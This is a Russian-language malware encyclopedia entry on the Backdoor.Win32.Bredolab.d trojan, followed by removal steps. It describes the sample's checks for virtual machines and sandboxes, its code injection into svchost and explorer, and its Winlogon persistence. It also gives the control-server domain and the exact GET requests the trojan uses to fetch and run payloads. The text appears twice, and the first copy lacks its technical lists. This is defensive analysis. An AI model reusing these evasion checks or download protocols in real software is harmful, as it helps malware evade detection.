Вредоносные программы → Backdoor.Win32.Bredolab.d
Описание:
Вредоносная программа, предназначенная для скрытого удалённого управления злоумышленником пораженным компьютером.
Тип вредоносной программы:
Backdoor
ОС подверженные заражению:
Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000
Уровень опасности:
высокий
Размер:
61 440 bytes
Технические детали:
Проверяет наличие файлов, в своем адресном пространстве. В случае обнаружения завершается:
наличие библиотек:
Проверяет ключ реестра:
в этом значении ищет вхождение строки «VBOX», в случае обнаружения завершается.
Чтобы исключить возможность исполнения себя в SandBox, проверяет несоответствие:
Проверяет имя, соответствующее запускаемому файлу:
- Если имя grpconv.exe, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
- Если имя explorer.exe, проверяет наличие файла %Temp%\~TM27FB4A.TMP, если находит, то в:
устанавливает значение ключа RunGrpCon в 1, перемещает
%Temp%\~TM27FB4A.TMP в %System%\Wbem\grpconv.exe, устанавливает у
%System%\Wbem\grpconv.exe атрибуты времени такие же как у
%System%\smss.exe, удаляет файлы %System%\grpconv.exe,
%System%\dllcache\grpconv.exe.
Создает мьютекс с именем _SYSTEM_4D2EF3A_.
Создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
- В случае произвольного имени, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае копирует себя в %Temp%\~TM27FB4A.TMP, инжектит себя в explorer.exe, запускает в нем новый поток, перемещает себя в %Temp%\~TM%TempName%, завершается.
Во всех случаях осуществляет проверку соответствия загруженных в свое адресное пространство модулей kernel.dll и ntdll.dll с файлами-образами на диске в %System%.
В kernel32.dll проверяет корректность функций:
в ntdll.dll функций:
и автоматически производит корректировку при несоответствии (anti-sandbox).
Работа svchost.exe:
Производится циклическая попытка подключения к www.jobfinder911.com.
При удачном подключении отправляется GET-запрос:
На основании полученного содержимого и значения поля Magic-Number, в котором хранится длина ключа и значение самого ключа, происходит расшифровка данных, которые могут записываться либо в новый файл
%Windows%\Temp\wpv%rand_number%.exe, с дальнейшим запуском файла, либо данные записываются в новый создаваемый процесс svchost (для этого случая установлен перехватчик функции ZwResumeThread из ntdll.dll, осуществляющий запись зловреда - функция вызывается из используемой CreateProcess).
Второй GET-запрос вида:
Осуществляется запись служебной информации в %APPDATA%\wiaserva.log.
Удаление:
#1 Отключить функцию "Восстановление системы"
#2 Полностью проверить систему антивирусом с обновлённой базой сигнатур
#3 Удалить все ключи реестра, созданные вредоносной программой; восстановить изменённые настройки (использовать regedit.exe)
Если при попытке запустить Редактор реестра, Командную строку и/или Диспетчер задач (любым способом) появляется окно с сообщением «Редактирование реестра запрещено администратором системы», «Приглашение командной строки отключено вашим администратором» и/или «Диспетчер задач отключён администратором», рекомендуем использовать бесплатно скачать и использовать бесплатную программу, RegComTas EnableR с помощью которой возможно восстановить прав пользователя на запуск системных утилит.
Вредоносная программа, предназначенная для скрытого удалённого управления злоумышленником пораженным компьютером.
Тип вредоносной программы:
Backdoor
ОС подверженные заражению:
Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000
Уровень опасности:
высокий
Размер:
61 440 bytes
Технические детали:
Проверяет наличие файлов, в своем адресном пространстве. В случае обнаружения завершается:
%System%\drivers\hgfs.sys
%System%\drivers\prleth.sys
%System%\drivers\vmhgfs.sys
наличие библиотек:
dbghelp.dll
sbiedll.dll
Проверяет ключ реестра:
HKLM\HARDWARE\Description\System\SystemBiosVersion
в этом значении ищет вхождение строки «VBOX», в случае обнаружения завершается.
Чтобы исключить возможность исполнения себя в SandBox, проверяет несоответствие:
1. Имя пользователя - CurrentUser, Sandbox;
2. Имя компьютера - SANDBOX;
3. Имя пользователя - user и имя пользователя - USER;
4. Значения ключа ProductID в HKLM\Microsoft\Windows\CurrentVersion:- 55274-640-2673064-23950 (JoeBox)
- 76487-644-3177037-23510 (CWSandbox)
- 76487-337-8429955-22614 (Anubis)
Проверяет имя, соответствующее запускаемому файлу:
- Если имя grpconv.exe, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
- Если имя explorer.exe, проверяет наличие файла %Temp%\~TM27FB4A.TMP, если находит, то в:
HKCU\SoftWare\Microsoft\WindowsNT\CurrentVersion\Winlogon
устанавливает значение ключа RunGrpCon в 1, перемещает
%Temp%\~TM27FB4A.TMP в %System%\Wbem\grpconv.exe, устанавливает у
%System%\Wbem\grpconv.exe атрибуты времени такие же как у
%System%\smss.exe, удаляет файлы %System%\grpconv.exe,
%System%\dllcache\grpconv.exe.
Создает мьютекс с именем _SYSTEM_4D2EF3A_.
Создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
- В случае произвольного имени, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае копирует себя в %Temp%\~TM27FB4A.TMP, инжектит себя в explorer.exe, запускает в нем новый поток, перемещает себя в %Temp%\~TM%TempName%, завершается.
Во всех случаях осуществляет проверку соответствия загруженных в свое адресное пространство модулей kernel.dll и ntdll.dll с файлами-образами на диске в %System%.
В kernel32.dll проверяет корректность функций:
CreateRemoteThread
WriteProcessMemory
VirtualProtectEx
VirtualAllocEx
в ntdll.dll функций:
ZwAllocateVirtualMemory
ZwWriteVirtualMemory
ZwProtectVirtualMemory
ZwCreateThread
ZwAdjustPrivelegesToken
ZwOpenProcess
ZwOpenThread
ZwQueueApcThread
и автоматически производит корректировку при несоответствии (anti-sandbox).
Работа svchost.exe:
Производится циклическая попытка подключения к www.jobfinder911.com.
При удачном подключении отправляется GET-запрос:
GET /l/controller.php?action=bot&entity_list={числа через запятую}&uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712
На основании полученного содержимого и значения поля Magic-Number, в котором хранится длина ключа и значение самого ключа, происходит расшифровка данных, которые могут записываться либо в новый файл
%Windows%\Temp\wpv%rand_number%.exe, с дальнейшим запуском файла, либо данные записываются в новый создаваемый процесс svchost (для этого случая установлен перехватчик функции ZwResumeThread из ntdll.dll, осуществляющий запись зловреда - функция вызывается из используемой CreateProcess).
Второй GET-запрос вида:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&entity={число:unique_start|unique_failed|repeat_start|repeat_failed;число:...}
Осуществляется запись служебной информации в %APPDATA%\wiaserva.log.
Удаление:
#1 Отключить функцию "Восстановление системы"
#2 Полностью проверить систему антивирусом с обновлённой базой сигнатур
#3 Удалить все ключи реестра, созданные вредоносной программой; восстановить изменённые настройки (использовать regedit.exe)
Если при попытке запустить Редактор реестра, Командную строку и/или Диспетчер задач (любым способом) появляется окно с сообщением «Редактирование реестра запрещено администратором системы», «Приглашение командной строки отключено вашим администратором» и/или «Диспетчер задач отключён администратором», рекомендуем использовать бесплатно скачать и использовать бесплатную программу, RegComTas EnableR с помощью которой возможно восстановить прав пользователя на запуск системных утилит.